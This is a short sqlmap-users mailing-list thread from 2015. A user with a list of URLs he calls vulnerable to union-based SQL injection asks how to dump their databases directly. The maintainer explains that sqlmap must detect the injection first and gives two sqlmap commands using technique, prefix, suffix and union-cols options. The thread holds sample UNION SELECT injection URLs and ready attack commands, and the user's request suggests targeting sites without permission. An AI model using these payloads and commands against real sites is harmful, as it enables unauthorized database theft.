[sqlmap-users] Fwd: Re: Dump database by injected url, without finding column

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Thanks for your reply "Miroslav Stampar", i understood.

07.10.2015 13:05, Miroslav Stampar пишет:
> sqlmap has to find a SQLi. It can't just dump data without knowing 
> anything about the SQLi. Every SQLi technique has different rules for 
> data dumping.
>
> I would suggest that you run (if you want to be stricter with your 
> given cases):
>
> python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU 
> --prefix="" --suffix="-- -" --union-cols=5
> python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU 
> --prefix="" --suffix="-- -" --union-cols=5
>
> Bye
>
> On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou... 
> <mailto:bog...@ou...>> wrote:
>
>     Hello!
>
>     I have a list of vulners UnionBased urls(example):
>
>     http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5--
>     http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]--
>
>     How can i to load one url of this list to sqlmap and dumping structure
>     of database, without finding injecting point?
>
>     Sorry, for my bad English, and Thanks!
>
>     ------------------------------------------------------------------------------
>     Full-scale, agent-less Infrastructure Monitoring from a single
>     dashboard
>     Integrate with 40+ ManageEngine ITSM Solutions for complete visibility
>     Physical-Virtual-Cloud Infrastructure monitoring from one console
>     Real user monitoring with APM Insights and performance trend reports
>     Learn More
>     http://pubads.g.doubleclick.net/gampad/clk?id=247754911&iu=/4140
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm